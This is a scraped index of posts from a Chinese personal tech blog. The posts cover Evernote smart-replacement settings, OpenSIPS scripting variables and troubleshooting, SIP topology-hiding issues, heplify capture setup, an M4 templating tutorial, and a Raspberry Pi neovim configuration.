以上两个问题,在粘贴代码的时候,是致命的问题。我本来粘贴的是两个\u0026ndash;,粘贴到印象笔记里居然变成一个中文破折号,那么后期再复制出来用的时候,必然出现问题。\n我问了官方的客服,官方的客服也不知道怎么解决。\n后来我自己在网上搜索,发现了解决问题的方法。\n以上所有的关于替换的问题,都是和编辑器的替换设置有关。\n打开一个笔记,然后点击右键\n选择替换,可以看到里面有智能引号,智能破折号,智能链接,文本替换,建议把这几个都取消勾选\n还有一个可能性,就是在**编辑-\u0026gt;拼写和语法-\u0026gt;自动拼写纠正,**这个要关闭。\n","permalink":"https://wdd.js.org/posts/2021/10/","summary":"为什么是印象笔记 作为一个笔记,或者说文本编辑器,一个最基本的要求,就是能如实呈现用户的按键输入。而不是用户输入了A,然后在页面上看到了B。\n但是对于印象笔记来说,我已经遇到过好多次因为输入问题,几乎想要放弃印象笔记。但是就目前来讲,仍然没有好用的替代品。\n对于笔记软件来说,我有以下的几个最为基础的要求。\n必须跨平台。能够有桌面端App和IOS或者安卓的APP 必须同步要快。 必须要能有网页剪藏的插件 必须要少折腾,用户体验好。我的目的是记录内容,而不是折腾各种同步或者网络配置。 必须是付费的产品。免费的产品,是没有可持续发展潜力的。当然,付费需要在接受范围之内。 必须足够稳定 用户界面,体验必须足够好 必须要离线使用 就目前来说,能满足以上几个要求的,屈指可数。\n印象笔记虽然有恶心的广告推送(即使会员也有广告),但是一般在非特殊的日子,广告不会一直存在的。\n印象笔记不太智能的替换 把英文单引号替换成中文单引号 把两个\u0026ndash;替换成一个中文破折号 以上两个问题,在粘贴代码的时候,是致命的问题。我本来粘贴的是两个\u0026ndash;,粘贴到印象笔记里居然变成一个中文破折号,那么后期再复制出来用的时候,必然出现问题。\n我问了官方的客服,官方的客服也不知道怎么解决。\n后来我自己在网上搜索,发现了解决问题的方法。\n以上所有的关于替换的问题,都是和编辑器的替换设置有关。\n打开一个笔记,然后点击右键\n选择替换,可以看到里面有智能引号,智能破折号,智能链接,文本替换,建议把这几个都取消勾选\n还有一个可能性,就是在**编辑-\u0026gt;拼写和语法-\u0026gt;自动拼写纠正,**这个要关闭。","title":"印象笔记不太智能的智能替换"},{"content":"avp_db_query是用来做数据库查询的,如果查到某列的值是NULL, 那么对应到脚本里应该如何比较呢?\n可以用avp的值与\u0026quot;\u0026quot;, 进行比较\nif ($avp(status) == \u0026#34;\u0026lt;null\u0026gt;\u0026#34;) 参考 https://stackoverflow.com/questions/52675803/opensips-avp-db-query-cant-compare-null-value ","permalink":"https://wdd.js.org/opensips/ch5/avp-db-query/","summary":"avp_db_query是用来做数据库查询的,如果查到某列的值是NULL, 那么对应到脚本里应该如何比较呢?\n可以用avp的值与\u0026quot;\u0026quot;, 进行比较\nif ($avp(status) == \u0026#34;\u0026lt;null\u0026gt;\u0026#34;) 参考 https://stackoverflow.com/questions/52675803/opensips-avp-db-query-cant-compare-null-value ","title":"avp_db_query数值null值比较"},{"content":"文本处理的难点 有一个文本文件,摘抄其中两行内容如下,里面有db_addr, local_ip这两个配置,需要在不同环境中修改。\ndb_addr=1.2.3.4:3306 local_ip=192.168.2.4 但是哪些地方要修改呢?为了提醒后续的维护者,我们给要修改的地方加个备注吧。\ndb_addr=1.2.3.4:3306 # 这里要修改 local_ip=192.168.2.4 # 这里要修改 .... ... if len(a) = 1024 { # 这里要修改1024 ... } ... 
用sed替换? 让别人一个一个地方去修改,也太麻烦了,有没有可能用脚本去处理呢?例如我们用DB_ADDR和LOCAL_IP这种字符串作为占位符,然后我们就可以用sed之类的命令去做替换了。\ndb_addr=DB_ADDR local_ip=LOCAL_IP sed -i \u0026#39;s/DB_ADDR/1.2.3.4:3306/g;s/LOCAL_IP/192.168.0.1/g\u0026#39; 1.cfg 这样做是有点方便了,但是也有以下几个问题\n如果定义的占位符太多,sed会变得越来越长 如果某些占位符里本身就含有/或者一些特殊含义的字符,就需要做特殊处理了 用M4吧,专业的人做专业的事情 apt-get install m4 通过命令行定义宏 1.m4\ndb_addr=DB_ADDR local_ip=LOCAL_IP .... ... if len(a) = MAX_LEN { ... } ... M4可以使用-D来定义宏和宏对应的值,默认输出到标准输出,我们可以用\u0026gt;将输出写到文件中\nm4 -D DB_ADDR=1.2.3.4:3306 -D LOCAL_IP=192.168.2.2 -D MAX_LEN=2048 1.m4 db_addr=1.2.3.4:3306 local_ip=192.168.2.2 .... ... if 1 = 2048 { ... } ... 用define语句定义宏 用define()语句来定义宏 用`\u0026lsquo;来作为字符串引用,避免被展开 define(`DB_ADDR\u0026#39;, `1.2.3.4:3306\u0026#39;) define(`LOCAL_IP\u0026#39;, `192.168.2.2\u0026#39;) define(`MAX_LEN\u0026#39;, `2048\u0026#39;) db_addr=DB_ADDR local_ip=LOCAL_IP .... ... if len(a) = MAX_LEN { ... } ... 执行命令m4 1.m4, 可以看到宏展开,但是有很多空行。\ndb_addr=1.2.3.4:3306 local_ip=192.168.2.2 .... ... if 1 = 2048 { ... } ...% 用dnl避免产生空行 在define语句的末尾,加上dnl\ndefine(`DB_ADDR\u0026#39;, `1.2.3.4:3306\u0026#39;)dnl define(`LOCAL_IP\u0026#39;, `192.168.2.2\u0026#39;)dnl define(`MAX_LEN\u0026#39;, `2048\u0026#39;)dnl db_addr=DB_ADDR local_ip=LOCAL_IP .... ... if len(a) = MAX_LEN { ... } ... 执行m4 1.m4 可以看到,空行没了\ndb_addr=1.2.3.4:3306 local_ip=192.168.2.2 .... ... if 1 = 2048 { ... } ... 抽离出宏配置文件 将1.m4分成两个文件1.m4, 1.conf\n1.conf\ndivert(-1) define(`DB_ADDR\u0026#39;, `1.2.3.4:3306\u0026#39;) define(`LOCAL_IP\u0026#39;, `192.168.2.2\u0026#39;) define(`MAX_LEN\u0026#39;, `2048\u0026#39;) divert(0) 1.m4\ndb_addr=DB_ADDR local_ip=LOCAL_IP .... ... if len(a) = MAX_LEN { ... } ... 执行:m4 1.conf 1.m4\ndb_addr=1.2.3.4:3306 local_ip=192.168.2.2 .... ... if 1 = 2048 { ... } ... 
读取环境变量 define(`MY_NAME\u0026#39;, `esyscmd(`printf \u0026#34;${MY_NAME:-wdd}\u0026#34;\u0026#39;)\u0026#39;)dnl ","permalink":"https://wdd.js.org/posts/2021/09/","summary":"文本处理的难点 有一个文本文件,内容如下,摘抄其中两行内容如下,里面有两个配置db_addr, local_ip这两个配置,需要在不同环境要修改的。\ndb_addr=1.2.3.4:3306 local_ip=192.168.2.4 但是哪些地方要修改呢?为了提醒后续的维护者,我们给要修改的地方加个备注吧。\ndb_addr=1.2.3.4:3306 # 这里要修改 local_ip=192.168.2.4 # 这里要修改 .... ... if len(a) = 1024 { # 这里要修改1024 ... } ... 用sed替换? 让别人一个一个地方去修改,也太麻烦了,有没有可能用脚本去处理呢?例如我们用DB_ADDR和LOCAL_IP这种字符串作为占位符,然后我们就可以用sed之类的命令去做替换了。\ndb_addr=DB_ADDR local_ip=LOCAL_IP sed -i \u0026#39;s/DB_ADDR/1.2.3.4:3306/g;s/LOCAL_IP/192.168.0.1/g\u0026#39; 1.cfg 这样做是有点方便了,但是也有以下几个问题\n如果定义的占位符太多,sed会变得越来越长 如果某些占位符里本身就含有/或者一些特殊含义的字符,就需要做特殊处理了 用M4吧,专业的人做专业的事情 apt-get install m4 通过命令行定义宏 1.m4\ndb_addr=DB_ADDR local_ip=LOCAL_IP .... ... if len(a) = MAX_LEN { ... } ... M4可以使用-D来定义宏和宏对应的值,默认输出到标准输出,我们可以用\u0026gt;将输出写到文件中\nm4 -D DB_ADDR=1.2.3.4:3306 -D LOCAL_IP=192.168.2.2 -D MAX_LEN=2048 1.m4 db_addr=1.2.3.4:3306 local_ip=192.168.2.2 .... ... 
if 1 = 2048 { .","title":"简单实用的M4教程"},{"content":"ERROR:core:tcp_init_listener: could not get TCP protocol number CRITICAL:core:send_fd: sendmsg failed on 0: Socket operation on non-socket ERROR:core:send2child: send_fd failed 不要将tcp_child设置为0\n","permalink":"https://wdd.js.org/opensips/ch7/sendmsg-failed/","summary":"ERROR:core:tcp_init_listener: could not get TCP protocol number CRITICAL:core:send_fd: sendmsg failed on 0: Socket operation on non-socket ERROR:core:send2child: send_fd failed 不要将tcp_child设置为0","title":"sendmsg failed on 0: Socket operation on non-socket"},{"content":"问题表现 在经过初始化请求之后,路径发现完成。在这个dialog中所有的请求,正常来ua1和ua2之间的所有请求,都应该经过us1和us2。\n如下图所示:\n某些时候,ua1可能直接把BYE消息直接发送给ua2, 但是一般ua1和ua2是存在uat网络的,所以这个BYE消息,ua2很可能收不到。\n问题的表现就是电话无法正常挂断。\n问题分析 可能原因1: us1和us2没有做record-route, 导致请求直接根据某个请求的响应消息的Contact头,直接发送了。 可能原因2: 某些请求的拓扑隐藏没有做好 拓扑隐藏问题具体分析 假如我们在us1上正确的做了拓扑隐藏,那么ua1的所有收到的响应,它的Contact头的地址都会改成us1的地址。那么ua1是无论如何都获取不到ua2的直接地址的。\n但是,假如某个消息处理的不对呢?\n注意180响应5到6, 其中us1正确的修改了Contact头 ua1收到180后,立即发送了notify消息 如果us1没有正确处理notify的响应的Contact头,us1就会把ua2的Contact信息发送给ua1。有些notify的响应带有Contact头,有些没带有。 但是这里会出现一个竞争条件,invite的200ok和notify的200ok,消息到达的顺序,将影响ua2的Contact信息 如果ua1后收到invite的200ok, 此时ua1获取ua2的地址是us1 如果ua2后收到notify的200ok, 此时ua2获取的ua2的地址就是ua2 所以问题的表现可能是有偶现的,这种问题处理其实是比较棘手的 当然也是有解决方案的 方案1, us1对notify正确处理响应消息Contact, 将其修改成us1 方案2,us1直接删除notify响应消息的Contact头 ","permalink":"https://wdd.js.org/opensips/ch7/escape-msg/","summary":"问题表现 在经过初始化请求之后,路径发现完成。在这个dialog中所有的请求,正常来ua1和ua2之间的所有请求,都应该经过us1和us2。\n如下图所示:\n某些时候,ua1可能直接把BYE消息直接发送给ua2, 但是一般ua1和ua2是存在uat网络的,所以这个BYE消息,ua2很可能收不到。\n问题的表现就是电话无法正常挂断。\n问题分析 可能原因1: us1和us2没有做record-route, 导致请求直接根据某个请求的响应消息的Contact头,直接发送了。 可能原因2: 某些请求的拓扑隐藏没有做好 拓扑隐藏问题具体分析 假如我们在us1上正确的做了拓扑隐藏,那么ua1的所有收到的响应,它的Contact头的地址都会改成us1的地址。那么ua1是无论如何都获取不到ua2的直接地址的。\n但是,假如某个消息处理的不对呢?\n注意180响应5到6, 其中us1正确的修改了Contact头 ua1收到180后,立即发送了notify消息 如果us1没有正确处理notify的响应的Contact头,us1就会把ua2的Contact信息发送给ua1。有些notify的响应带有Contact头,有些没带有。 
但是这里会出现一个竞争条件,invite的200ok和notify的200ok,消息到达的顺序,将影响ua1获取的ua2的Contact信息 如果ua1后收到invite的200ok, 此时ua1获取ua2的地址是us1 如果ua1后收到notify的200ok, 此时ua1获取的ua2的地址就是ua2 所以问题的表现可能是偶现的,这种问题处理其实是比较棘手的 当然也是有解决方案的 方案1, us1对notify正确处理响应消息Contact, 将其修改成us1 方案2,us1直接删除notify响应消息的Contact头 ","title":"信令路径逃逸分析"},{"content":"heplify是个独立的抓包程序,类似于tcpdump之类的网络抓包程序,可以把抓到的sip包,编码为hep格式。然后送到hep server上,由hep server负责包的整理和存储。\nheplify安装非常简单,在仓库的release页面,可以下载二进制程序。二进制程序赋予可执行权限后,可以直接在x86架构的机器上运行。\n因为heplify是go语言写的,你也可以基于源码,编译其他架构的二进制程序。\nhttps://github.com/sipcapture/heplify\n-i 设定抓包的网卡 -m 设置抓包模式为SIP -hs 设置hep server的地址 -p 设置日志文件的路径 -dim 设置过滤一些不关心的sip包 -pr 设置抓包的端口范围 nohup ./heplify \\ -i eno1 \\ -m SIP \\ -hs 192.168.1.2:9060 \\ -p \u0026#34;/var/log/\u0026#34; \\ -dim OPTIONS,REGISTER \\ -pr \u0026#34;18627-18628\u0026#34; \u0026amp; opensips模块本身就有proto_hep模块支持hep抓包,为什么我还要用heplify来抓包呢?\n低于2.2版本的opensips不支持hep抓包 opensips的hep抓包还是不太稳定。我曾遇到过因为hep抓包导致opensips崩溃的事故。如果用外部的抓包程序,即使抓包有问题,还是不会影响到opensips。 ","permalink":"https://wdd.js.org/opensips/tools/heplify/","summary":"heplify是个独立的抓包程序,类似于tcpdump之类的网络抓包程序,可以把抓到的sip包,编码为hep格式。然后送到hep server上,由hep server负责包的整理和存储。\nheplify安装非常简单,在仓库的release页面,可以下载二进制程序。二进制程序赋予可执行权限后,可以直接在x86架构的机器上运行。\n因为heplify是go语言写的,你也可以基于源码,编译其他架构的二进制程序。\nhttps://github.com/sipcapture/heplify\n-i 设定抓包的网卡 -m 设置抓包模式为SIP -hs 设置hep server的地址 -p 设置日志文件的路径 -dim 设置过滤一些不关心的sip包 -pr 设置抓包的端口范围 nohup ./heplify \\ -i eno1 \\ -m SIP \\ -hs 192.168.1.2:9060 \\ -p \u0026#34;/var/log/\u0026#34; \\ -dim OPTIONS,REGISTER \\ -pr \u0026#34;18627-18628\u0026#34; \u0026amp; opensips模块本身就有proto_hep模块支持hep抓包,为什么我还要用heplify来抓包呢?\n低于2.2版本的opensips不支持hep抓包 opensips的hep抓包还是不太稳定。我曾遇到过因为hep抓包导致opensips崩溃的事故。如果用外部的抓包程序,即使抓包有问题,还是不会影响到opensips。 ","title":"heplify SIP信令抓包客户端"},{"content":"简介 OpenSIPS的路由脚本提供了几种不同类型的变量。不同类型的变量有以下几个方面的差异。\n变量的可见性 变量引用的值 变量的读写性质:有些变量是只读的,有些变量可读可写 变量是否有多个值:有些变量只有一个值,有些变量有多个值 语法 $(\u0026lt;context\u0026gt;name(subname)[index]{transformation}) 除了name以外 ,其他都是可选的值。\nname(必传):变量名的类型,例如pvar, avp, ru, 
DLG_status等等 subname: 变量名称,例如hdr(From), avp(name) index: 索引,某些变量可以有多个值,类似于数组。可以用索引去引用对应的元素。从0开始,也可以是负值如-1, 表示倒数第一个。 transformation: 转换。做一些格式转换,字符串截取等等操作 context: 上下文。OpenSIP有两个上下午,请求request、相应reply。想想一个场景,你在一个相应路由里如何拿到请求路由的某个值呢? 可以使用$(ru). 或者在一个失败路由里获取一个Concact的信息$(hdr(Contact)) 举例:\n仅仅通过类型来引用:$ru 通过类型和名称来引用:$hrd(Contact), 引用某个SIP header的值 通过类型和索引来引用:$(ct[0]) 通过类型、名称、索引来引用:$(avp(addr)[0]) 变量的类型 脚本变量 脚本变量只有一个值 脚本变量可读可写 脚本变量在路由及其子路由中都是可见的 脚本变量使用前务必先初始化,否则可能会引用到之前的值 脚本变量的值可以是字符串,也可以是整数类型 脚本变量读写比avp变量快 脚本变量会持久存在一个OpenSIPS进程中 将脚本变量设置为NULL, 实际上是将变量的值设置为'0\u0026rsquo;, 脚本变量没有NULL值。 脚本变量之存在与一个路由中 使用举例\nroute{ $var(a) = 19 $var(a) = \u0026#34;wdd\u0026#34; $var(a) = \u0026#34;wdd\u0026#34; + \u0026#34;@\u0026#34; + $td; if(route(check_out, 1)){ xlog(\u0026#34;check error\u0026#34;); } } route[check_out]{ # 注意,这里$var(a)的值就不存在了 xlog(\u0026#34;$var(a)\u0026#34;); if ($param(1) \u0026gt; 1) { return (-1); } return(1); } avp变量 avp变量一般会关联到一个sip消息或者SIP事务上. avp变量可以有多个值 可以avp变量理解成一个后进先出的栈 所有处理这个消息的子路由都可以获得avp的变量。但是如果想在响应路由中想获取请求路由中的avp变量,则需要设置TM模块的onreply_avp_mode参数:modparam(\u0026quot;tm\u0026quot;,\u0026quot;onreply_avp_mode\u0026quot;, 1) $avp(trunk)=\u0026#34;hello\u0026#34;; $avp(trunk)=\u0026#34;duan\u0026#34;; $avp(trunk)=\u0026#34;hi\u0026#34;; # 可以把trunk的值理解成下面的样子 # hi -\u0026gt; duan -\u0026gt; hello xlog(\u0026#34;$avp(trunk)\u0026#34;); 这里只能打印出hi xlog(\u0026#34;$(avp(trunk)[2])\u0026#34;); 这里能打印hello $avp(trunk)=NULL; 这里能删除最后的一个值,如果只有一个值,那么整个avp会被删除 avp_delete(\u0026#34;$avp(trunk)/g\u0026#34;); # 删除avp所有的值,包括这个avp自身。 $(avp(trunk)[1])=\u0026#34;heihei\u0026#34;; 重新赋值 $(avp(trunk)[1])=NULL; 删除某一个值 伪变量 伪变量主要是对SIP消息的各个部分进行引用的\n大部分伪变量很好接,都是缩写的单词的首字母。\n伪变量以$开头,加sip消息字段的缩写,例如$ci, 代表sip callID 序号 名称 是否可修改 含义 1 $ai 引用P-Asserted-Identify头的url 2 $adu Authentication Digest URI 3 $ar Authentication realm 4 $au Auth username user 5 $ad Auth username domain 6 $an Auth nonce 7 $auth.resp Auth response 8 $auth.nonce Auth nonce 9 $auth.opaque the opaque 字符串 10 $auth.alg 认证算法 11 $auth.qop 
qop参数的值 12 $auth.nc nonce count参数 13 $aU 整个username 14 $Au 计费用的账户名,主要是acc会用 15 $argv 获取通过命令行参数设置参数-o。例如在启动opensips时```bash opensips -o maxsiplength=1200 \u0026lt;br /\u0026gt;\u0026lt;br /\u0026gt;在脚本里就可以通过$argv(maxsiplength)\u0026lt;br /\u0026gt;```bash xlog(\u0026#34;maxsiplength: is $argv(maxsiplength)\u0026#34;) | | 16 | $af | | ip协议,可能是INET(ipv4), 或者是INET6(ipv6) | | 17 | $branch | | 用来创建新的分支```bash $branch=\u0026ldquo;sip:new#domain\u0026rdquo;;\n| | 18 | $branch() | | \u0026lt;br /\u0026gt;- $branch(uri)\u0026lt;br /\u0026gt;- $branch(duri)\u0026lt;br /\u0026gt;- $branch(q)\u0026lt;br /\u0026gt;- $branch(path)\u0026lt;br /\u0026gt;- $branch(flags)\u0026lt;br /\u0026gt;- $branch(socket)\u0026lt;br /\u0026gt; | | 19 | **$ci** | | 引用sip call-id。 (call-id) | | 20 | **$cl** | | 引用sip body部分的长度。(content-length) | | 21 | $cs | | 引用 cseq number | | 22 | $ct | | 引用Contact\u0026lt;br /\u0026gt;- $ci\u0026lt;br /\u0026gt;- $(ct[n])\u0026lt;br /\u0026gt;- $(ct[-n])\u0026lt;br /\u0026gt; | | 23 | $ct.fields() | \u0026lt;br /\u0026gt; | \u0026lt;br /\u0026gt;- $ct.fields(name)\u0026lt;br /\u0026gt;- $ct.fields(uri)\u0026lt;br /\u0026gt;- $ct.fields(q)\u0026lt;br /\u0026gt;- $ct.fields(expires)\u0026lt;br /\u0026gt;- $ct.fields(methods)\u0026lt;br /\u0026gt;- $ct.fields(received)\u0026lt;br /\u0026gt;- $ct.fields(params) 所有的参数\u0026lt;br /\u0026gt; | | 24 | $cT | | \u0026lt;br /\u0026gt;- $cT Content-Type\u0026lt;br /\u0026gt;- $(cT[n])\u0026lt;br /\u0026gt;- $(cT[-n])\u0026lt;br /\u0026gt;- $(cT[*])\u0026lt;br /\u0026gt; | | 25 | **$dd** | | 引用目标url里面的domain部分 | | 26 | $di | | diversion header | | 27 | $dip | | diversion privacy prameter | | 29 | $dir | | diversion reason parameter | | 30 | $dp | | 目标url的端口号部分 (destionation port) | | 31 | $dP | | 目标url的传输协议部分 (destionation protocol) | | 32 | $ds | | destionation set | | 33 | **$du** | | 引用 destionation url | | 34 | $err.class | | 错误的类别\u0026lt;br /\u0026gt;- 1 解析错误\u0026lt;br /\u0026gt; | | 35 | $err.level | | 错误的级别 | | 36 
| $err.info | | 错误信息的描述 | | 37 | $err.rcode | | error reply code | | 38 | $err.rreason | | error reply reason | | 39 | **$fd** | | From URI domain | | 40 | **$fn** | | From display name | | 41 | **$fs** | | 强制使用某个地址发送消息。 (forced socket)\u0026lt;br /\u0026gt;格式:proto:ip:port | | 42 | $ft | | From tag | | 43 | **$fu** | | From URL | | 44 | **$fU** | | username in From URL | | 45 | **$log_level** | | 可以用来动态修改日志级别\u0026lt;br /\u0026gt;$log_level=4;\u0026lt;br /\u0026gt;\u0026lt;br /\u0026gt;$log_level=NULL; 恢复默认值 | | 46 | $mb | | sip message buffer | | 47 | $mf | | message flags | | 48 | $mi | | sip message id | | 49 | **$ml** | | sip message length | | 50 | $od | | domain in original R-URI | | 51 | $op | | port in original R-URI | | 52 | $oP | | transport protocol of original R-URI | | 53 | $ou | | original URI | | 54 | $oU | | username in original URI | | 55 | **$param(idx)** | | 引用路由参数,从1开始\u0026lt;br /\u0026gt;```bash route{ route(R_NAME, $var(debug), \u0026#34;pp\u0026#34;); } route[R_NAME]{ $param(1); #引用第一个参数 $var(debug) $param(2); #引用第二个参数 pp } | | 56 | $pd | | domain in sip P-Prefered-Identify header | | 57 | $pn | | display name in sip P-Prefered-Identify header | | 58 | $pp | | process id | | 59 | $pr $proto | | 接受消息的协议 UDP, TCP, TLS, SCTP, WS | | 60 | $pu | | URL in sip P-Prefered-Identify header | | 61 | $rd | | domain in request url | | 62 | $rb | | body of request/replay- $rb- $(rb[*])- $(rb[n])- $(rb[-n])- $rb(application/sdp)- $rb(application/isup) | | 63 | $rc $retcode | | 上个函数的返回结果 | | 64 | $re | | remote-party-id | | 65 | $rm | | sip method | | 66 | $rp | | port of R-RUI | | 67 | $rP | | transport protocol pf R-URI | | 68 | $rr | | reply reason | | 69 | $rs | | reply status | | 70 | $ru | | request url | | 71 | $rU | | | | 72 | $ru_q | | | | 73 | $Ri | | | | 74 | $Rp | | | | 75 | $sf | | | | 76 | $si | | | | 77 | $sp | | | | 78 | $tt | | | | 79 | $tu | | | | 80 | $tU | | | | 81 | $time(format) | | | | 82 | $T_branch_idx | | | | 83 | $Tf | | | | 84 | 
$Ts | | | | 85 | $Tsm | | | | 86 | $TS | | | | 87 | $ua | | | | 88 | $(hdr(name)[N]) | | | | 89 | $rT | | | | 90 | $cfg_line $cfg_file | | | | 91 | $xlog_level | | |\n","permalink":"https://wdd.js.org/opensips/ch5/core-var-2/","summary":"简介 OpenSIPS的路由脚本提供了几种不同类型的变量。不同类型的变量有以下几个方面的差异。\n变量的可见性 变量引用的值 变量的读写性质:有些变量是只读的,有些变量可读可写 变量是否有多个值:有些变量只有一个值,有些变量有多个值 语法 $(\u0026lt;context\u0026gt;name(subname)[index]{tramsformation}) 除了name以外 ,其他都是可选的值。\nname(必传):变量名的类型,例如pvar, avp, ru, DLG_status等等 subname: 变量名称,例如hdr(From), avp(name) index: 索引,某些变量可以有多个值,类似于数组。可以用索引去引用对应的元素。从0开始,也可以是负值如-1, 表示倒数第一个。 transformation: 转换。做一些格式转换,字符串截取等等操作 context: 上下文。OpenSIP有两个上下午,请求request、相应reply。想想一个场景,你在一个相应路由里如何拿到请求路由的某个值呢? 可以使用$(ru). 或者在一个失败路由里获取一个Concact的信息$(hdr(Contact)) 举例:\n仅仅通过类型来引用:$ru 通过类型和名称来引用:$hrd(Contact), 引用某个SIP header的值 通过类型和索引来引用:$(ct[0]) 通过类型、名称、索引来引用:$(avp(addr)[0]) 变量的类型 脚本变量 脚本变量只有一个值 脚本变量可读可写 脚本变量在路由及其子路由中都是可见的 脚本变量使用前务必先初始化,否则可能会引用到之前的值 脚本变量的值可以是字符串,也可以是整数类型 脚本变量读写比avp变量快 脚本变量会持久存在一个OpenSIPS进程中 将脚本变量设置为NULL, 实际上是将变量的值设置为'0\u0026rsquo;, 脚本变量没有NULL值。 脚本变量之存在与一个路由中 使用举例\nroute{ $var(a) = 19 $var(a) = \u0026#34;wdd\u0026#34; $var(a) = \u0026#34;wdd\u0026#34; + \u0026#34;@\u0026#34; + $td; if(route(check_out, 1)){ xlog(\u0026#34;check error\u0026#34;); } } route[check_out]{ # 注意,这里$var(a)的值就不存在了 xlog(\u0026#34;$var(a)\u0026#34;); if ($param(1) \u0026gt; 1) { return (-1); } return(1); } avp变量 avp变量一般会关联到一个sip消息或者SIP事务上.","title":"核心变量解读-100%"},{"content":"配置 树莓派3B+的配置\n4核1G CPU ARMv7 Processor 64G SD卡 常用软件 neovim LXTerminal终端 chrome浏览器 谷歌拼音输入法 常用语言 golang c nodejs 外设 键盘鼠标: 雷柏 无线机械键盘加鼠标 150块左右 屏幕:一块ipad大小外接屏幕,400块左右 常用工作 Golang UDP Server开发, 总体还算流畅。前提时不要加载太多的neovim插件,特别象coc-vim, go-vim等插件,安装过后让你卡的绝望。每次当我绝望之时,我就关闭了图形界面,回到终端继续干活。但是即使使用纯文本方式登录,运行vim还是很卡。 后来我在macbook pro上也用neovim开发,发现也是很卡。于是我就释然了,9千多的macbook都卡,300多的树莓派卡一点怎么了! 
但是卡顿还是非常影响心情的,于是我就大量精简vim的插件。 我基本上就用两个插件,都是和状态栏有关的。其他十二个插件都给注释掉了 call plug#begin(\u0026#39;~/.vim/plugged\u0026#39;) Plug \u0026#39;vim-airline/vim-airline\u0026#39; Plug \u0026#39;vim-airline/vim-airline-themes\u0026#39; Plug \u0026#39;jiangmiao/auto-pairs\u0026#39; \u0026#34;Plug \u0026#39;yonchu/accelerated-smooth-scroll\u0026#39; \u0026#34;Plug \u0026#39;preservim/tagbar\u0026#39;, { \u0026#39;for\u0026#39;: [\u0026#39;go\u0026#39;, \u0026#39;c\u0026#39;]} \u0026#34;Plug \u0026#39;airblade/vim-gitgutter\u0026#39; \u0026#34;Plug \u0026#39;fatih/vim-go\u0026#39;, { \u0026#39;do\u0026#39;: \u0026#39;:GoUpdateBinaries\u0026#39;, \u0026#39;for\u0026#39;: \u0026#39;go\u0026#39; } \u0026#34;Plug \u0026#39;dense-analysis/ale\u0026#39; \u0026#34;Plug \u0026#39;vim-scripts/matchit.zip\u0026#39; \u0026#34;Plug \u0026#39;pangloss/vim-javascript\u0026#39;, {\u0026#39;for\u0026#39;:\u0026#39;javascript\u0026#39;} \u0026#34;Plug \u0026#39;leafgarland/typescript-vim\u0026#39; \u0026#34;Plug \u0026#39;neoclide/coc.nvim\u0026#39;, {\u0026#39;branch\u0026#39;: \u0026#39;release\u0026#39;} \u0026#34;Plug \u0026#39;jremmen/vim-ripgrep\u0026#39; \u0026#34;Plug \u0026#39;plasticboy/vim-markdown\u0026#39; \u0026#34;Plug \u0026#39;mzlogin/vim-markdown-toc\u0026#39; call plug#end() filetype plugin indent on filetype plugin on filetype indent on set guicursor= set history=1000 let g:netrw_banner=0 let g:ale_linters = { \\ \u0026#39;javascript\u0026#39;: [\u0026#39;standard\u0026#39;], \\ \u0026#39;typescript\u0026#39;: [\u0026#39;tsserver\u0026#39;] \\} let g:ale_fixers = {\u0026#39;javascript\u0026#39;: [\u0026#39;standard\u0026#39;]} let g:ale_lint_on_save = 1 let g:ale_fix_on_save = 1 let g:ale_typescript_tsserver_executable=\u0026#39;tsserver\u0026#39; let g:airline#extensions#tabline#enabled = 1 let g:ale_set_loclist = 0 let g:ale_set_quickfix = 1 let g:ale_open_list = 0 let g:vim_markdown_folding_disabled = 1 let g:vmt_cycle_list_item_markers = 1 let g:tagbar_sort = 0 \u0026#34; 
colorscheme codedark \u0026#34; let g:airline_theme = \u0026#39;codedark\u0026#39; \u0026#34; \u0026#34; buffer let mapleader = \u0026#34;,\u0026#34; nnoremap \u0026lt;Leader\u0026gt;j :bp\u0026lt;CR\u0026gt; \u0026#34; previous buffer nnoremap \u0026lt;Leader\u0026gt;k :bn\u0026lt;CR\u0026gt; \u0026#34; next buffer nnoremap \u0026lt;Leader\u0026gt;n :bf\u0026lt;CR\u0026gt; \u0026#34; first buffer nnoremap \u0026lt;Leader\u0026gt;m :bl\u0026lt;CR\u0026gt; \u0026#34; last buffer nnoremap \u0026lt;Leader\u0026gt;l :b#\u0026lt;CR\u0026gt; \u0026#34; alternate buffer nnoremap \u0026lt;Leader\u0026gt;e :e\u0026lt;CR\u0026gt; \u0026#34; open netrw nnoremap \u0026lt;Leader\u0026gt;d :bd\u0026lt;CR\u0026gt; \u0026#34; close buffer nnoremap \u0026lt;Leader\u0026gt;g :!go fmt %\u0026lt;CR\u0026gt; \u0026#34; go fmt current file nnoremap \u0026lt;Leader\u0026gt;tm :%s/\\s\\+$//e\u0026lt;CR\u0026gt; \u0026#34; trim space at endofline nnoremap \u0026lt;Leader\u0026gt;a A nnoremap \u0026lt;Leader\u0026gt;w :w\u0026lt;CR\u0026gt; nnoremap \u0026lt;Leader\u0026gt;c :clo\u0026lt;CR\u0026gt; nnoremap \u0026lt;Leader\u0026gt;/ :Rg\u0026lt;Space\u0026gt; inoremap jj \u0026lt;ESC\u0026gt; highlight CocErrorFloat ctermfg=White let g:netrw_list_hide= \u0026#39;.*\\.swp$\u0026#39; let g:ctrlp_custom_ignore = { \\ \u0026#39;dir\u0026#39;: \u0026#39;\\v[\\/]\\.?(git|hg|svn|node_modules)$\u0026#39;, \\ \u0026#39;file\u0026#39;: \u0026#39;\\v\\.(exe|so|dll|min.js)$\u0026#39;, \\ \u0026#39;link\u0026#39;: \u0026#39;some_bad_symbolic_links\u0026#39;, \\ } set autoread \u0026#34; au CursorHold,CursorHoldI * :e \u0026#34; au FocusGained,BufEnter * :e set so=7 set ruler set cmdheight=2 set hid set backspace=eol,start,indent set whichwrap+=\u0026lt;,\u0026gt;,h,l set ignorecase set smartcase set hlsearch set incsearch set showmatch set mat=2 syntax enable set background=dark set ffs=unix,dos,mac \u0026#34;set ai \u0026#34;Auto indent \u0026#34;set si \u0026#34;Smart indent set wrap \u0026#34;Wrap 
